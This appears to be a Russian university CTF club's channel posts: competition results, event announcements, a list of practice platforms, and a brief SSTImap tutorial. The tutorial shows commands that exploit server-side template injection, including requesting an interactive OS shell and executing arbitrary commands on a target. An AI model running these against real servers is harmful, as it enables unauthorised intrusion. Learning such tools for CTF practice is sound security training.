*⌨️ *Итоги RedShift.Eclipse 2
Сразу после SibintekCTF команда PunchClub вышла в финал RedShift.Eclipse, решив практически все задания. За эти выходные ребята заработали себе две поездки в Москву. Пожелаем им удачи в финале!

*🫡 *Итоги SibintekCTF
В отборочном этапе команда PunchClub завершила соревнования на 4 месте, набрав максимальное кол-во очков. Также команда EverSploit, решив все задания, заняла 6 место. Пожелаем удачи в финале!

*😱 *Итоги Студент CTF 2024
Сдав все комиссии, сборная команда Политеха заняла 3 место в финале СтудентCTF. Соревнование проходило в формате A/D. Кроме того, наша команда единственная нашла и успешно эксплуатировала одну из представленных уязвимостей.

Успейте зарегистрироваться на новый CTF-марафон от «Доктор Веб»!

Все участники, независимо от набранных баллов, получат лицензию на Dr.Web Security Space для защиты 1 компьютера на 1 год, а главный возможный приз — должность вирусного аналитика в компании «Доктор Веб».

Подробнее на сайте.

🚩 Где же прокачать навыки?

Если вы хотите повысить свои навыки для участия в CTF, есть несколько отличных платформ, которые помогут освоить основные техники и подготовиться к решению задач:

🔵 Forkbomb
🔵 Codeby Games
🔵 Root Me
🔵 CryptoHack
🔵 PicoCTF

Эти ресурсы предоставляют разнообразные возможности для обучения и практики в области информационной безопасности, что является важным для успешного участия в CTF 😒

Желаем удачи в изучении и подготовке!

Ваш PolyCTF👾

*🏆 *Итоги PSUTI КиберКод 2024
Сборная Политеха снова продемонстрировала отличные результаты! Команда PunchClub, выступая за сборную, уверенно заняла первое 1 место на КиберКод 2024 от PSUTI.

Успейте зарегистрироваться на Sibintek CTF-2024!

Участников ждут интересные задания более чем из 6 различных категорий. Лучшие команды сразятся в финале в Москве.

Подробнее на сайте.

Открыта регистрация на RedShift.Eclipse 2!

Участников ждёт много интересных тасков в отборочном этапе и очный финал в Москве в формате defense!

Подробнее на сайте.

Надеемся, что вас ещё не охватила ностальгия по прошлому Кубку, ведь сегодня открывается регистрация на VIII CTF Cup 2024!

До отбора остался месяц, а значит пора готовится и собирать команду!

Скажем сразу: в этом году один из зачётов Кубка претерпел изменения, читайте о нём на сайте CTF News.

SSTImap — это инструмент с открытым исходным кодом, предназначенный для автоматизации процесса обнаружения и эксплуатации уязвимостей Server-Side Template Injection (SSTI) в веб-приложениях.

Установка SSTImap

git clone https://github.com/vladko312/SSTImap.git cd SSTImap pip install \-r requirements.txt python3 sstimap.py \-\-help

Основные примеры использованияРассмотрим несколько примеров использования SSTImap для тестирования веб-приложений на наличие уязвимостей SSTI.

Этот пример запускает SSTImap для анализа URL на наличие уязвимостей SSTI в get-параметре:

python3 SSTImap.py \-u "http://example.com/vuln.php?name=John" \-s

Если уязвимая точка находится в POST-запросе, можно использовать следующую команду:

python3 SSTImap.py \-u "http://example.com/vuln.php" \-\-data="name=John" \-s

Опция -s используется для запроса интерактивной оболочки операционной системы.

SSTImap может автоматически извлекать информацию о сервере после обнаружения уязвимости. Например, для извлечения версии используемого шаблонизатора:

python3 SSTImap.py \-u "http://example.com/vuln.php?name=John" \-\-template\-info

После извлечения информации о шаблонизаторе можно попытаться выполнить произвольный код на сервере. Например, для выполнения команды на сервере:

python3 SSTImap.py \-u "http://example.com/vuln.php?name=John" \-\-exec="ls \-la"